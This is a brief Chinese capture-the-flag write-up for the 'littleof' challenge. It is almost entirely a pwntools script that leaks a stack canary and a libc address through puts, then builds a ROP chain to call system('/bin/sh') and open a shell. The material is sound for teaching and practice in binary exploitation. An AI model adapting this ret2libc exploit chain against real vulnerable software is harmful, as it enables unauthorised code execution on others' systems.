鹤壁杯--littleof
这也是一道retlibc的题目,首先我们需要泄露canary的值。绕过保护。
这里我们覆盖canary的最后一个字节,打印出canary的值。
1 from pwn import*
2 #sh = remote("182.116.62.85", 27056)
3 sh = process('./littleof')
4 elf = ELF('./littleof')
5 libc = ELF('./libc-2.27.so')
6 context.log_level='debug'
7
8 pop_rdi_ret = 0x0400863
9 main_addr = 0x0400789
10 pop_rsi_r15_ret = 0x0400861
11
12 payload = 'A'*(0x50-8)
13
14 sh.recvuntil("?")
15 sh.sendline(payload)
16 sh.recvuntil("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
17 #gdb.attach(sh)
18 canary = u64(sh.recv(8).ljust(8,b'\x00'))
19
20 payload = 'a'*(0x50-8) + p64(canary) + 'b'*8 + p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(main_addr)
21
22 sh.recvuntil("!")
23 sh.sendline(payload)
24
25 leak = u64(sh.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
26 libc_base = leak - libc.symbols['puts']
27 sys_addr = libc_base + libc.symbols['system']
28 binsh_addr = libc_base + libc.search('/bin/sh\x00').next()
29
30 payload = 'D'*(0x50-8)
31
32 sh.recvuntil("?")
33 sh.sendline(payload)
34 sh.recv()
35
36 payload = 'c'*(0x50-8) + p64(canary) + 'd'*8 + p64(pop_rdi_ret) + p64(binsh_addr) + p64(pop_rsi_r15_ret) + p64(0)*2 + p64(sys_addr)
37
38 sh.recvuntil("!")
39 sh.sendline(payload)
40
41 sh.interactive()
浙公网安备 33010602011771号